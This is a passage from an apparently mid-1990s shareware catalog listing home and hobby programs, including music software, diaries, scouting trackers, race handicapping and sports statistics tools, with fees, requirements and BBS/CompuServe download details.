other products. Lifetime free upgrading allowed. + Look for: CDMW310.ZIP on BBSs (multiple files) (call 317-784-2147 + to download it at no charge); CDM4W.ZIP on CompuServe in + CIS:PCAPP forum LIBrary 7 (multiple files) (or contact userID + 70272,3317 for assistance). + Download size: 856k (about 64 minutes with a 2400 baud modem) + Description: + CD lovers need a program as sophisticated as the format itself + to catalog their collections. This is the answer! The program + is easy to use and powerful. Standard entries for title, + artist, CD number, category, and tunes (plus 3 user defined + fields! The user can obtain printouts for all or criteria, and + can search for all fields or combination, even tunes! Printouts + include: an abbreviated listing, full catalog, 3X5 and Rolodex + + Chapter 15, "Home & hobby" 560 + + + + cards, front labels, and 3 different styles of complete tune + lists! + + + Product: CDPlayer for Windows and DOS + Author: , +44-081-946-4826 + Version: 3.4 (10-31-93) + Needs: IBM PC, DOS 3.3 or better. 400k RAM. + Strongly recommended: Hard disk; Mouse. Sound card. + Registration fee: L-15.00 (add L-6.00 for shipping to U.S. + addresses) (add L-6.00 for shipping to Canadian addresses) (add + L-6.00 for shipping outside U.S. or Canada) + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); lifetime unlimited phone, fax, BBS, CompuServe, + mail support; bonus utilities. Lifetime free upgrading + allowed. + Look for: CDPLAY34.ZIP on BBSs (call 215-623-6203 to download it + at no charge); CDPJ.ZIP on CompuServe in CIS:CDROM forum + LIBrary 4 (or contact userID 100140,2134 for assistance). + Download size: 310k (about 23 minutes with a 2400 baud modem) + Description: + All the functions associated with a normal CD player, together + with the ability to catalog and search your collection. + * Custom, single track & shuffle play/repeat + * Fit tracks to time for recording + * Track skip, music search, replay track & pause + * On screen volume + * Multiple CDROM support + * Disc catalogue: disc name, composer/artist, music type, + disc reference, track details + * Browse catalog - word search + * Elapsed/remaining times + * Small handset toggle + + + Product: MCBase + Relational music collection database system. See full + description on page 525. + + Chapter 15, "Home & hobby" 561 + + + + Product: Melissa's Music Flashcards + Author: , 714-898-7262 + Version: 3.1 (10-28-93) + Needs: IBM PC, DOS 3.3 or better. Program can run safely on a + system with no hard disk and only one floppy disk drive; EGA + monitor; Mouse. + Registration fee: $18.50 (add $2.50 for shipping to U.S. + addresses) (add $2.50 for shipping to Canadian addresses) (add + $5.00 for shipping outside U.S. or Canada) + Registration benefits: choice of 31/2" or 51/4" master disk(s); + lifetime unlimited phone, fax, CompuServe, mail support; + discounts on other products. + Look for: FGSMMF.ZIP on BBSs; FGSMMF.ZIP on CompuServe in + CIS:PCAPP forum LIBrary 11 (or contact userID 70233,1315 for + assistance). + Download size: 57k (about four minutes with a 2400 baud modem) + Description: + Kids of all ages can learn to read music. You can set the type + of note that appears on the screen from flats to sharps. The + program will acknowledge if your choice is correct by smiling + at you or if your selection was wrong it will cry. The program + was written to add some fun to the drudgery of trying to learn + music. The program also includes a hint feature which shows the + correct key on the piano keyboard. Also includes 6 pre-made + song to play. + + + Product: MicroPlayerCD(tm) + Play audio CDs on your computer's CDROM drive. See full + description on page 75. + + Product: MOZART (Virtuoso Edition) + Author: + Version: 1.3 (01-03-95) + Needs: IBM 80386, Windows 3.1 or better. 4096k RAM. + Registration fee: $49.00 (add $6.00 for shipping to U.S. + addresses) (add $6.00 for shipping to Canadian addresses) (add + $6.00 for shipping outside U.S. or Canada) + Registration benefits: Full program functionality; 31/2" master + disk(s); 12 months of CompuServe, mail support; bonus data; + discounts on upgrades. Scores up to 64 staves; illustrated + help. + Look for: MOZART13.ZIP on BBSs; MOZART.ZIP on CompuServe in + CIS:MUSICA forum LIBrary 12 (or contact userID 100042,3516 for + assistance). + SWREG#: 4080 + Download size: 2000k (about 149 minutes with a 2400 baud modem) + Description: + A music processor for Windows 3.1. Using only the computer + keyboard, you can create, edit and print sheet music with high- + quality TrueType symbols. WYSIWYG. Its primary aim is to print + parts for musicians, but MIDI files can be exported to provide + an "aural preview" on multimedia PCs. Features include: instant + transposition; automatic default quaver (eighth note) tail + + Chapter 15, "Home & hobby" 562 + + + + groupings; automatic bar-line entry; optional "swing" + interpretation; on-line help. + + + Product: Music Sculptor for Windows + Author: , 403-257-2115 + Version: 1.4 (03-07-94) + Needs: IBM AT (80286), Windows 3.1 or better. 200k RAM; CGA + monitor; Mouse; sound card. + Strongly recommended: EGA monitor; Hard disk. + Registration fee: $24.95 (add $5.00 for shipping to U.S. + addresses) (add $5.00 for shipping to Canadian addresses) (add + $5.00 for shipping outside U.S. or Canada) + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); lifetime unlimited phone, CompuServe, mail + support; lifetime return policy; bonus utilities; bonus data; + all ASP-wide offers (see page 5); disks of other shareware; + discounts on other products. + Look for: MUSIC14.ZIP on BBSs; MUS14.ZIP on CompuServe in + CIS:WINFUN forum LIBrary 6 (or contact userID 72613,3574 for + assistance). + PsL#: 11251 + Download size: 230k (about 17 minutes with a 2400 baud modem) + Description: + A very easy to use MIDI sequencer with music keyboard window. + Record, edit, and play music. Works with any Windows- + compatible sound card or MIDI interface. Use with either + external MIDI keyboard or music keyboard window which can be + played using mouse or computer keyboard. Attractive and fully + functional. MIDI files included. + + + Product: Musical Instrument Tuner + Author: , 317-856-3860 + Version: 1.01 (02-23-94) + Needs: IBM PC, DOS 3.2 or better. 512k RAM; Program can run + safely on a system with no hard disk and only one floppy disk + drive; CGA monitor. + Strongly recommended: Hard disk; Epson printer; sound card. + Registration fee: $10.00 + Registration benefits: 3 months of unlimited phone, mail support. + Look for: TUNER101.ZIP on BBSs. + Download size: 90k (about seven minutes with a 2400 baud modem) + Description: + Creates reference tones for tuning various musical instruments + such as guitar, banjo, violin and mandolin. There is also a + large selection of scales available for tuning other + instruments. Works with Sound Blaster or the PC speaker. + + + Product: A MUSICAL TUTORIAL + An excellent way to promote musical study. See full + description on page 476. + + Chapter 15, "Home & hobby" 563 + + + + Product: A MUSICAL TUTORIAL for Windows + An excellent way to promote musical study. See full + description on page 477. + + Product: MusicEase + Author: , 317-782-9903 + Version: 4.2 (09-10-85) + Needs: IBM PC, DOS 2.1 or better. 640k RAM; Program can run + safely on a system with no hard disk and only one floppy disk + drive; CGA monitor; Hercules monitor. + Strongly recommended: Hard disk; HP LaserJet printer. + Registration fee: $49.00 (add $3.00 for shipping to U.S. + addresses) (add $5.00 for shipping to Canadian addresses) (add + $8.00 for shipping outside U.S. or Canada) + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); 3 months of unlimited phone, BBS, CompuServe, + mail support; 3-month return policy; bonus utilities; bonus + data; all ASP-wide offers (see page 5); discounts on other + products; discounts on upgrades. + Look for: ME420.ZIP on BBSs (call 317-784-2147 to download it at + no charge); MUSCEZ.ZIP on CompuServe in CIS:PCFUN forum LIBrary + 4 (or contact userID 73567,1547 for assistance). + SWREG#: 1371 + Download size: 430k (about 32 minutes with a 2400 baud modem) + Description: + Formerly a successful commercial product, this music score + editor lets you create, edit, print and play music notation. + WYSIWYG screen oriented editor providing a constraint based + system with a large amount of knowledge of music notation. Will + intelligently handle many of the details of scoring + automatically. Can create professional looking scores easily + and quickly. Enter notes using the computer keyboard or by + playing them on a MIDI instrument (MPU-401 only). Can + transpose, invert and retrograde. + + Chapter 15, "Home & hobby" 564 + + + + Product: NoteWorthy + Author: , +44-1750-721854 + Version: 1.87 (12-29-94) + Needs: IBM PC, DOS 3.0 or better. 640k RAM; EGA monitor; + Hercules monitor. + Strongly recommended: Hard disk; HP DeskJet printer; HP + LaserJet printer; Postscript printer; Epson printer. + Registration fee: L-40.00 + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); lifetime unlimited phone, CompuServe, mail + support; bonus utilities; discounts on upgrades. + Look for: NW187*.ZIP on BBSs; NW187*.ZIP on CompuServe in + CIS:UKSHARE forum LIBrary 5 (or contact userID 100415,3372 for + assistance). + SWREG#: 3764 + PsL#: 11597 + Download size: 250k (about 19 minutes with a 2400 baud modem) + Description: + WYSIWYG music editor for the professionally-minded musician. + DOS-based, and supports Epson, IBM Proprinter, Canon, + Postscript, Laserjet, Canon LBP printers. Full set of musical + symbols on staves bound in any fashion into systems. Four fonts + for text work, justification and compression of staves. + Transposition (including any chord symbols used) and straight + lines and curves. Very easy interface, inc demonstration mode + and on-line tutorial. Does not play music, but is a high- + quality printing system. + + + Product: Relor Rhyming Dictionary + Type in a word & program displays rhyme words. See full + description on page 203. + + Product: SoundMasterDb + Author: , 404-516-8575 + Version: 2.02 (09-14-92) + Needs: IBM PC, DOS 3.1 or better. 512k RAM. + Strongly recommended: CGA monitor; Hard disk. + Registration fee: $31.95 (add $4.00 for shipping to U.S. + addresses) (add $4.00 for shipping to Canadian addresses) (add + $8.00 for shipping outside U.S. or Canada) + Registration benefits: 51/4" master disk(s); 3 months of support; + discounts on other products; discounts on upgrades. + Look for: SND202.ZIP on BBSs (call 703-680-9269 to download it at + no charge); SND.ZIP on CompuServe in CIS:PCAPP forum LIBrary 7 + (or contact userID 72427,1603 for assistance); SND202.ZIP on + GEnie in IBMPC forum LIBrary 15 (or contact userID L.TURNER1 + for assistance). + Download size: 192k (about 14 minutes with a 2400 baud modem) + Description: + Top rated audio librarian available. Handles all audio formats + (CDs, cassettes, albums, etc.) through its relational database + design. Advanced data input/display screen stores an unlimited + number of songs per side. Nine reports that can be indexed 6 + + Chapter 15, "Home & hobby" 565 + + + + ways. Lists reports to screen, printer or disk. Quick find/ + search on single or multiple fields. Features context sensitive + help, online manual, screen saver, mouse support and much more. + + + Product: SoundZ + The ultimate music librarian. See full description on + page 526. + + Product: SoundZ For Windows + The ultimate music librarian. See full description on + page 527. + + + 15.17 Personalities + + Product: By the Numbers + Personality analysis with Numerology. See full description on + page 531. + + Product: ESPTEST + Parapsychology tool. See full description on page 478. + + Product: JailBird + Create & print vanity license plate replicas. See full + description on page 495. + + Product: RagTime for Windows + Event & recreation planner for women (& guys). See full + description on page 125. + + Product: The Richard Webster System + Author: + Version: 4.0 (05-16-95) + Needs: IBM PC, DOS 2.11 or better. 512k RAM; Program can run + safely on a system with no hard disk and only one floppy disk + drive; CGA monitor. + Strongly recommended: EGA monitor; Hard disk; HP LaserJet + printer. + Registration fee: $0.00 + Registration benefits: + Look for: WEB40.ZIP on BBSs; WEBSTR.ZIP on CompuServe in + CIS:PCVENK forum LIBrary 9 (or contact userID 74774,403 for + assistance). + Download size: 175k (about 13 minutes with a 2400 baud modem) + Description: + Based on the work of internationally-know psychic entertainer + Richard Webster, "Aura Reading" helps you learn what to look + for when attempting to see the human aura. "Quick Numerology" + helps you put together a short but pointed personality profile + using someone's date of birth. It's a fascinating way to + understand more about those around you. Great fun at parties! + + Chapter 15, "Home & hobby" 566 + + + + Product: Your ESP Test + Find out if you have psychic powers! See full description on + page 535. + + 15.17.1 Diaries & journals + + Product: Dear Diary + Diary/daily journal. See full description on page 150. + + Product: My Life + Author: + Version: 2.2 (09-30-94) + Needs: IBM 80386, Windows 3.1 or better. 4096k RAM; EGA monitor; + Hard disk; VBRUN300.DLL. PKUNZIP v2.04G or later. + Strongly recommended: VGA monitor; HP DeskJet printer; HP + LaserJet printer; Postscript printer; Mouse; Epson printer. + Registration fee: $32.00 (add $3.00 for shipping to Canadian + addresses) (add $3.00 for shipping outside U.S. or Canada) + Registration benefits: 31/2" master disk(s); lifetime unlimited + BBS, CompuServe, mail support; 3-month return policy; all ASP- + wide offers (see page 5); discounts on upgrades. 3-month free + upgrading allowed. + Look for: MYL22.ZIP on BBSs (call 602-814-0483 to download it at + no charge); MYL22.ZIP on CompuServe in CIS:WINSHARE forum + LIBrary 0 (or contact userID 71162,2311 for assistance). + SWREG#: 2155 + Download size: 1405k (about 105 minutes with a 2400 baud modem) + Description: + A personal diary, journal, scrapbook, and word processor for + Windows. The scrapbook can be used to store and play movies and + sounds. Pictures can also be stored and viewed. Multiple + databases can be created, one for each member of the family, + and each database can be password protected. + + + 15.18 Photography + + Product: PhotoPat + Color-by-number patterns from bitmaps. See full description on + page 517. + + + 15.19 Planes, trains & automobiles + + Product: Car Restoration Diary + Data tracking for vintage auto restoration. See full + description on page 233. + + Chapter 15, "Home & hobby" 567 + + + + Product: Chris's Automobile Recorder + Author: + Version: 13.2 (01-08-94) + Needs: IBM PC, DOS 3.3 or better. 300k RAM; Dual 720k floppy + drives. + Strongly recommended: VGA monitor; Hard disk. + Registration fee: $0.00 + Registration benefits: lifetime BBS, CompuServe, mail support; + all ASP-wide offers (see page 5). + Look for: CAR132.ZIP on BBSs (call 513-274-0821 to download it at + no charge); CAR132.ZIP on CompuServe in CIS:PCAPP forum LIBrary + 7 (or contact userID 71001,1370 for assistance). + Download size: 300k (about 23 minutes with a 2400 baud modem) + Description: + Operation, maintenance, and inspection logger and reminder for + vehicles and machines. Quick & easy to use, yet 100% + comprehensive & powerful. Has context-sensitive pop-up help + and a 51 p. manual. Reminders, reports, and graphs help you + operate reliably and economically. Detailed, printed logs add + value at resale time. Supports metric, foreign currencies, + multiple vehicles & machines. The best program of its class at + any price. + + + Product: Vehicle Costs + Reports on costs involved with vehicle use. See full + description on page 293. + + + 15.20 Quotes & anecdotes + + See also: Data, Quotes & anecdotes. + + Product: Jokes & Quotes + Network/standalone daily message system. See full description + on page 384. + + Product: Rev. Lowell's Treasury of Humor + Searchable indexed Windows humor collection. See full + description on page 609. + + + 15.21 Reading (and writing, too) + + Product: Creativity Package + Become more creative & improve your writing. See full + description on page 210. + + Product: Have You Read That Movie? + Quiz/database: films based on literary works. See full + description on page 626. + + Chapter 15, "Home & hobby" 568 + + + + Product: PoeTrio + Three poetry tutorials with separate editors. See full + description on page 454. + + Product: Poetry Generator + Turn your computer into a poet! See full description on + page 211. + + Product: SNAKE + Author: , 216-632-5447 + Version: 1.0 (10-01-94) + Needs: IBM 80386, Windows 3.1 or better. 4000k RAM; VGA monitor; + Hard disk; Mouse; sound card. + Registration fee: $6.00 + Registration benefits: lifetime unlimited tollfree 800# phone, + fax, CompuServe, GEnie, newsletter, mail support; 1-month + return policy; all ASP-wide offers (see page 5); disks of other + shareware; discounts on other products; discounts on upgrades. + Shareware copy of next disk in series; 10% discount of other + Chatfield Software products. + Look for: availability unknown on BBSs. + Download size: 772k (about 58 minutes with a 2400 baud modem) + Description: + "Art-for-art's-sake" poetry. + + + 15.22 Scouting + + See also: Home & hobby, Sports, Firearms; Home & hobby, Hunting + & fishing. + + Product: ARROW TRACKER + Author: , 301-490-7104 + Version: 2.0 (05-31-94) + Needs: IBM PC, DOS 3.3 or better. 490k RAM; Hard disk. + Strongly recommended: HP DeskJet printer; HP LaserJet printer; + Epson printer. + Registration fee: $35.00 (add $3.00 for shipping to U.S. + addresses) + Registration benefits: lifetime unlimited tollfree 800# phone, + fax, CompuServe, mail support; 3-month limited return policy; + discounts on upgrades. 1 free update disk(s) sent out. + Look for: ARTR20.ZIP on BBSs; ARTR20.ZIP on CompuServe in + CIS:SCOUTING forum LIBrary 2 (or contact userID 100014,2347 for + assistance). + Download size: 305k (about 23 minutes with a 2400 baud modem) + Special instructions: Product distribution restricted to the + United States. + Description: + A menu driven program designed for OA Chapter use which stores + member info, dues status, committee assignments, honors, and + participation. Produces labels and multiple rosters, individual + records for each member as well as events and attendance + + Chapter 15, "Home & hobby" 569 + + + + summary. Lodge Registration gets copies for all chapters plus + consolidation program. + + + Product: MERIT BADGE TRACKER + Author: , 301-490-7104 + Version: 4.0 (06-02-95) + Needs: IBM PC, DOS 3.0 or better. 310k RAM; Hard disk. + Strongly recommended: CGA monitor; HP DeskJet printer; HP + LaserJet printer; Epson printer. + Registration fee: $35.00 (add $3.00 for shipping to U.S. + addresses) (add $3.00 for shipping to Canadian addresses) (add + $3.00 for shipping outside U.S. or Canada) + Registration benefits: Full program functionality; choice of 31/2" + or 51/4" master disk(s); lifetime unlimited tollfree 800# phone, + fax, CompuServe, mail support; 3-month limited return policy; + all ASP-wide offers (see page 5); discounts on upgrades. 1 + free update disk(s) sent out. + Look for: MBTR40.ZIP on BBSs; MBTR40.ZIP on CompuServe in + CIS:SCOUTING forum LIBrary 2 (or contact userID 100014,2347 for + assistance). + Download size: 850k (about 63 minutes with a 2400 baud modem) + Description: + A menu-driven program which store information on Merit Badge + counselors and presents that informaio in various reports. Will + generate rosters, Annual verification letters, and Labels. + + + Product: PACK TRACKER + Author: , 301-490-7104 + Version: 4.0 (10-01-94) + Needs: IBM PC, DOS 3.0 or better. 320k RAM; Hard disk. + Strongly recommended: CGA monitor; HP DeskJet printer; HP + LaserJet printer; Epson printer. + Registration fee: $35.00 (add $3.00 for shipping to U.S. + addresses) (add $3.00 for shipping to Canadian addresses) (add + $3.00 for shipping outside U.S. or Canada) + Registration benefits: Full program functionality; choice of 31/2" + or 51/4" master disk(s); lifetime unlimited tollfree 800# phone, + fax, CompuServe, mail support; 3-month limited return policy; + all ASP-wide offers (see page 5); discounts on upgrades. 1 + free update disk(s) sent out. + Look for: PKTR40.ZIP on BBSs; PKTR40.ZIP on CompuServe in + CIS:SCOUTING forum LIBrary 2 (or contact userID 100014,2347 for + assistance). + Download size: 800k (about 60 minutes with a 2400 baud modem) + Description: + A menu-driven program which stores information on Pack Scous + and Scouters and produces Rosters, Labels, Individual Records, + Attendance summaries, Listing of Awards Earned, An Advancement + Report, and various demographic reports. + + Chapter 15, "Home & hobby" 570 + + + + Product: POST TRACKER + Author: , 301-490-7104 + Version: 1.0 (01-27-94) + Needs: IBM PC, DOS 3.3 or better. 500k RAM. + Strongly recommended: Dual 720k floppy drives; Hard disk. + Registration fee: $35.00 (add $3.00 for shipping to U.S. + addresses) + Registration benefits: choice of 31/2" or 51/4" master disk(s); + lifetime unlimited tollfree 800# phone, fax, CompuServe, mail + support; 3-month limited return policy; all ASP-wide offers + (see page 5). 1 free update disk(s) sent out. + Look for: POTR10.ZIP on BBSs; POTR10.ZIP on CompuServe in + CIS:SCOUTING forum LIBrary 2 (or contact userID 100014,2347 for + assistance). + Download size: 309k (about 23 minutes with a 2400 baud modem) + Special instructions: Product distribution restricted to the + United States. + Description: + A menu-driven program which stores Post roster, attendance, + participation, Post offices, and training data. For boys who + are continuing to work on Eagle Scout, it also stores complete + Scout history; i.e., Merit Badges earned, advancement received, + troop offices, etc. Produces adult and explorer rosters, a + roster of former members, mailing labels, an individual record, + a post telephone call sheet and participation points summary. + + + Product: SHIP TRACKER + Author: , 301-490-7104 + Version: 1.2 (03-15-93) + Needs: IBM PC, DOS 2.0 or better. 256k RAM. + Strongly recommended: Dual 720k floppy drives; Hard disk. + Registration fee: $35.00 (add $2.00 for shipping to U.S. + addresses) + Registration benefits: lifetime unlimited tollfree 800# phone, + CompuServe, mail support; 3-month limited return policy. 1 + free update disk(s) sent out. + Look for: SHTR12.ZIP on BBSs; SHTR12.ZIP on CompuServe in + CIS:SCOUTING forum LIBrary 2 (or contact userID 10014,2347 for + assistance). + Download size: 228k (about 17 minutes with a 2400 baud modem) + Special instructions: Product distribution restricted to the + United States. + Description: + Stores ship's roster, advancment data, participation data, + ship's offices served, meetings attended, and all training + data. Generates scout and scouter rosters, roster of former + ship's members, 3 types of mailing labels, an individual + records for each member, and an attendance summary for all + scouts. + + Chapter 15, "Home & hobby" 571 + + + + Product: TRAINING TRACKER + Author: , 301-490-7104 + Version: 3.0 (02-02-95) + Needs: IBM PC, DOS 3.0 or better. 540k RAM; Hard disk. + Strongly recommended: CGA monitor; HP DeskJet printer; HP + LaserJet printer; Epson printer. + Registration fee: $35.00 (add $3.00 for shipping to U.S. + addresses) (add $3.00 for shipping to Canadian addresses) (add + $3.00 for shipping outside U.S. or Canada) + Registration benefits: Full program functionality; choice of 31/2" + or 51/4" master disk(s); lifetime unlimited tollfree 800# phone, + fax, CompuServe, mail support; 3-month limited return policy; + discounts on upgrades. 3-month free upgrading allowed. 1 free + update disk(s) sent out. + Look for: availability unknown on BBSs; TNTR30.ZIP on CompuServe + in CIS:SCOUTING forum LIBrary 2 (or contact userID 100014,2347 + for assistance). + Download size: 900k (about 67 minutes with a 2400 baud modem) + Description: + A menu-driven database management system designed to serve the + needs of BSA Districts/Councils that want to keep track of the + training records of their volunteers. Generates all BSA + recommended reports for all levels of program. + + + Product: TROOP TRACKER + Author: , 301-490-7104 + Version: 5.0 (09-10-95) + Needs: IBM PC, DOS 3.0 or better. 530k RAM. + Strongly recommended: CGA monitor; HP LaserJet printer; Epson + printer. + Registration fee: $35.00 (add $3.00 for shipping to U.S. + addresses) (add $3.00 for shipping to Canadian addresses) + Registration benefits: Full program functionality; choice of 31/2" + or 51/4" master disk(s); lifetime unlimited tollfree 800# phone, + fax, CompuServe, mail support; 3-month return policy; all ASP- + wide offers (see page 5); discounts on upgrades. 1 free update + disk(s) sent out. + Look for: TRTR50.ZIP on BBSs; TRTR50.ZIP on CompuServe in + CIS:SCOUTING forum LIBrary 2 (or contact userID 100014,2347 for + assistance). + Download size: 1200k (about 89 minutes with a 2400 baud modem) + Description: + TROOP TRACKER is a menu-driven program with a context-sensitive + help system and mouse support. Requires 530K RAM and a Hard + Disk. Will generate Rosters, Lables, Individual Records, + Advancement Evaluations, Eligibility for OA Evaluations, + Attendance and Service Project PArticipation Reports; + Advancement Reports, National Camping Award Applications, + Demographic and in-troop housekeeping Reports + + Chapter 15, "Home & hobby" 572 + + + + Product: TROOP TRACKER 4 GIRLS + Author: , 301-490-7104 + Version: 2.0 (12-20-94) + Needs: IBM PC, DOS 3.0 or better. 320k RAM; Hard disk. + Strongly recommended: CGA monitor; HP DeskJet printer; HP + LaserJet printer; Epson printer. + Registration fee: $35.00 (add $3.00 for shipping to U.S. + addresses) (add $3.00 for shipping to Canadian addresses) (add + $3.00 for shipping outside U.S. or Canada) + Registration benefits: Full program functionality; choice of 31/2" + or 51/4" master disk(s); lifetime unlimited tollfree 800# phone, + CompuServe, mail support; 3-month limited return policy; all + ASP-wide offers (see page 5); discounts on upgrades. 1 free + update disk(s) sent out. + Look for: TR4G20.ZIP on BBSs; TT4G20.ZIP on CompuServe in + CIS:SCOUTING forum LIBrary 2 (or contact userID 100014,2347 for + assistance). + Download size: 750k (about 56 minutes with a 2400 baud modem) + Description: + A DOS-based menu-driven program which stores information on the + Girls and Leaders of a unit. Generates Rosters, Labels, + Individual Records, Honors Reports, Attendance and + Participation Summaries + + + 15.23 Self development + + Product: ASTRO + Astrology program. See full description on page 530. + + Product: ASTRO For Windows + Astrology program. See full description on page 530. + + Product: BUDDY: A Tutorial Companion + Eight-lesson AI tutorial for clearer writing. See full + description on page 212. + + Product: I Ching Empower Tool + The I Ching oracle answers your questions. See full + description on page 532. + + Product: NUMERO UNO + Numerology program. See full description on page 533. + + Product: PoeTrio + Three poetry tutorials with separate editors. See full + description on page 454. + + Product: POETRY STAR + An AI poetry tutor that chats & cracks jokes. See full + description on page 457. + + Chapter 15, "Home & hobby" 573 + + + + 15.24 Sports + + See also: Home & hobby, Hunting & fishing. + + 15.24.1 Betting pools + + See also: Home & hobby, Gambling. + st + Product: 1 &goal Fantasy Football + Runs a fantasy football league. See full description on + page 579. + + Product: FastBreak Fantasy Basketball + Complete fantasy basketball program. See full description on + page 577. + + Product: Keyboard Coach Fantasy Football + Head-to-head fantasy football. See full description on + page 579. + + Product: LineDrive Fantasy Baseball + Complete fantasy baseball package. See full description on + page 576. + + Product: NFL Forecaster for DOS + Predicts winners & spreads of NFL games. See full description + on page 580. + + Product: NFL Forecaster for Windows + Predicts winners & spreads of NFL Games. See full description + on page 580. + + 15.24.2 Handicapping + + See also: Home & hobby, Gambling. + + Chapter 15, "Home & hobby" 574 + + + + 15.24.2.1 For `the ponies' + + Product: Thoroughbred Handicapper Pro + Author: + Version: 2.1 (06-15-94) + Needs: IBM 80386, Windows 3.1 or better. 2000k RAM; CGA monitor; + Hard disk. + Strongly recommended: Mouse. + Registration fee: $30.00 + Registration benefits: Full program functionality; choice of 31/2" + or 51/4" master disk(s); lifetime unlimited CompuServe, mail + support; discounts on upgrades. + Look for: availability unknown on BBSs; THPRO.ZIP on CompuServe + in CIS:PCFUN forum LIBrary 9 (or contact userID 71742,3632 for + assistance). + SWREG#: 1668 + PsL#: 11045 + Download size: 500k (about 37 minutes with a 2400 baud modem) + Description: + A complete thoroughbred horserace handicapping system! + Powerful, yet easy to use, it incorporates a combination of + commonly used handicapping techniques to calculate the point + score and suggested wagering odds for each horse. Provides + reports for handicapping & wagers. Includes ability to track + all wagers; prints reports to screen & printer; choice of basic + or advanced handicapping; thorough on-screen help system; on- + disk user's manual; more. + + + Product: TURF.v93 + Author: + Version: 1.01 (05-14-94) + Needs: IBM PC, DOS 2.0 or better. 300k RAM. ANSI.SYS or + equivalent. + Strongly recommended: CGA monitor; Hard disk. + Registration fee: $25.00 (add $3.00 for shipping to U.S. + addresses) (add $3.00 for shipping to Canadian addresses) (add + $10.00 for shipping outside U.S. or Canada) + Registration benefits: Full program functionality; choice of 31/2" + or 51/4" master disk(s); lifetime mail support; 1-month limited + return policy; bonus utilities. + Look for: TURF9311.ZIP on BBSs. + Download size: 360k (about 27 minutes with a 2400 baud modem) + Description: + A powerful and highly advanced, highly sophisticated, yet easy- + to-use, thoroughbred race handicapping system. It combines + sound, well-established race handicapping principles with + scientific statistical analysis methodology, applied to years' + worth of actual race data, to create a handicapping tool which + can be used at race tracks, from Belmont Park to the county + fair, at OTB or anywhere thoroughbreds are racing and a Daily + Racing Form or similar publication is available. + + Chapter 15, "Home & hobby" 575 + + + + 15.24.2.2 For other + + Product: Golfhcap + Calculates handicaps using USGA Slope System. See full + description on page 581. + + Product: NFL Forecaster for DOS + Predicts winners & spreads of NFL games. See full description + on page 580. + + Product: NFL Forecaster for Windows + Predicts winners & spreads of NFL Games. See full description + on page 580. + + 15.24.3 Baseball/softball + + Product: Diamond Data + Author: , 508-851-6204 + Version: 4.6 (07-30-94) + Needs: IBM PC, DOS 2.1 or better. 256k RAM; Program can run + safely on a system with no hard disk and only one floppy disk + drive; CGA monitor. + Registration fee: $25.00 (add $5.00 for shipping outside U.S. or + Canada) + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); lifetime unlimited phone, CompuServe, + newsletter, mail support; 1-month return policy; bonus + utilities; disks of other shareware; discounts on other + products. + Look for: DDATA_46.ZIP on BBSs (call 508-454-3864 to download it + at no charge); DDATA.ZIP on CompuServe in CIS:PCNEW forum + LIBrary 9 (or contact userID 70313,3615 for assistance); + DDATA_46.ZIP on GEnie in SPORTS forum LIBrary 1 (or contact + userID W.GEISER for assistance). + SWREG#: 2063 + PsL#: 10653 + Download size: 111k (about eight minutes with a 2400 baud modem) + Description: + Manipulate data for your league or team. 34 different + statistics are kept for each player. 9 more for each game + played. Databases can be merged to allow league totals, + lifetime stats, season totals, etc. depending on what info is + stored in each DB. Great for helping generate that batting + order or awards for your team/league banquet! A report + generation facility allows sorting and filtering (exclude + players below a threshold) by any statistic and can output to a + file, disk, or printer. + + Chapter 15, "Home & hobby" 576 + + + + Product: League Manager + Author: , 813-683-4210 + Version: 1.90 (04-16-94) + Needs: IBM PC, DOS 3.3 or better. 640k RAM; CGA monitor. + Strongly recommended: Hard disk; Mouse. + Registration fee: $45.00 (add $3.00 for shipping outside U.S. or + Canada) + Registration benefits: choice of 31/2" or 51/4" master disk(s); + lifetime phone, newsletter, mail support; bonus utilities; all + ASP-wide offers (see page 5). 12-month free upgrading allowed. + Look for: availability unknown on BBSs. + Download size: 600k (about 45 minutes with a 2400 baud modem) + Description: + A serious program that will handle just about any kind of + amateur sports league for youth. Multiple databases track each + division, team, player, adult, and sponsor. Handles custom + registration forms, rosters and mailing labels. Numerous + reports. Online help, user friendly, menu driven interface, + easy to use Support for over 150+ printers. Includes player + stats for baseball/softball. Team rosters approved by Little + League, Babe Ruth, and Dixie Youth (others in approval + process). + + + Product: LineDrive Fantasy Baseball + Author: , 707-725-6016 + Version: 6.13 (02-18-94) + Needs: IBM PC, DOS 3.3 or better. 640k RAM; CGA monitor. + Strongly recommended: VGA monitor. + Registration fee: $35.00 + Registration benefits: 3 months of unlimited mail support; bonus + utilities; bonus data; all ASP-wide offers (see page 5); disks + of other shareware; discounts on other products. Lifetime free + upgrading allowed. + Look for: availability unknown on BBSs; LD613.ZIP on CompuServe + in CIS:LIBRARY forum LIBrary 0. + Download size: 334k (about 25 minutes with a 2400 baud modem) + Description: + Runs a fantasy baseball league for up to 15 teams. Standings + may be based on your choice of any or all of up to 12 + statistics. Compatable with USA Today Sports Center download + files (Automatic update utility included). + + Chapter 15, "Home & hobby" 577 + + + + Product: StatTrak for Baseball + Author: , 608-271-1586 + Version: 5.3 (01-15-95) + Needs: IBM PC, DOS 3.2 or better. 640k RAM; Program can run + safely on a system with no hard disk and only one floppy disk + drive; CGA monitor; Hard disk. + Registration fee: $39.95 (add $3.75 for shipping to U.S. + addresses) (add $3.75 for shipping to Canadian addresses) (add + $3.75 for shipping outside U.S. or Canada) + Registration benefits: Full program functionality; choice of 31/2" + or 51/4" master disk(s); lifetime unlimited phone, CompuServe, + mail support; lifetime return policy; discounts on other + products; discounts on upgrades. + Look for: APSSB53.ZIP on BBSs. + Download size: 200k (about 15 minutes with a 2400 baud modem) + Description: + Baseball/softball statistics management system for league, + tournament, or individual teams. Tracks batting, pitching, + fielding, game scores, team record, and team standings. Any + StatTrak report can be computed for any combination of games + (all games, league games, last 5 games, games 2-4-7, etc). Sort + on over 70 categories and even name your own additional + categories. Display and print reports or create report disk + files. Menu-driven and very easy to use. + + + 15.24.4 Basketball + + Product: Basketball Statistics + Author: , 616-861-5157 + Version: 1.0 (11-05-94) + Needs: IBM PC, DOS 2.0 or better. 512k RAM; CGA monitor. + Strongly recommended: Hard disk; Mouse. + Registration fee: $30.00 (add $2.00 for shipping to U.S. + addresses) (add $2.00 for shipping to Canadian addresses) (add + $5.00 for shipping outside U.S. or Canada) + Registration benefits: printed manual; choice of 31/2" or 